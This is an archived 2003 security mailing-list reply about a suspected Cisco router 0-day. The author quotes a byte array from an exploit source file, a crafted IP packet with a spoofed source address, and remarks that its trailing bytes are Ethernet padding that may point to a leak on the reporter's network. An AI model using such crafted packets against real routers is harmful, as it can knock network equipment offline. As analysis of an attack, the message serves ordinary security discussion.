Hosting Provided By

Re: Cisco 0-day? [Was: strange protocol scans (and MOBP plug)]

From: Philippe Biondi <biondi(at)cartel-securite.fr>
Date: Sun Jul 20 2003 - 07:03:12 EDT

On Sat, 19 Jul 2003, Michal Zalewski wrote:

> On Sat, 19 Jul 2003, Michal Zalewski wrote:

from mine.c:

unsigned char data[]={
0x45,0,0,0x14,0xfd,0xb1,0,0,0,0x37,0x08,0x1b,

80,50,156,4, /* bogus source */
0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0x23,0x12,0x77,0xaf};

The last line is ethernet padding, it should not be needed in the exploit and may be the sign of an etherleak vulnerbility in your lan.

-- 
Philippe Biondi  Cartel Sécurité
Security Consultant/R&D                      
http://www.cartel-securite.fr
PGP KeyID:3D9A43E2  FingerPrint:C40A772533730E39330DC0985EE8FF5F3D9A43E2



----------------------------------------------------------------------------
Attend the Black Hat Briefings & Training, July 28 - 31 in Las Vegas, the 
world's premier technical IT security event! 10 tracks, 15 training sessions, 
1,800 delegates from 30 nations including all of the top experts, from CSO's to 
"underground" security specialists.  See for yourself what the buzz is about!  
Early-bird registration ends July 3.  This event will sell out. www.blackhat.com
----------------------------------------------------------------------------

Received on Sun Jul 20 14:12:26 2003

This message: [ Message body ]
Next message: Keith: "RE: Windows XP Guest Account."
Previous message: Richard Johnson: "Re: Cisco IOS Denial of Service that affects most Cisco IOS routers- requires power cycle to recover"
In reply to Michal Zalewski: "Cisco 0-day? [Was: strange protocol scans (and MOBP plug)]"

Contemporary messages sorted: [ By Date ] [ By Thread ] [ By Subject ] [ By Author ] [ By messages with attachments ]

This archive was generated by hypermail 2.1.8 : Wed Aug 23 2006 - 14:02:12 EDT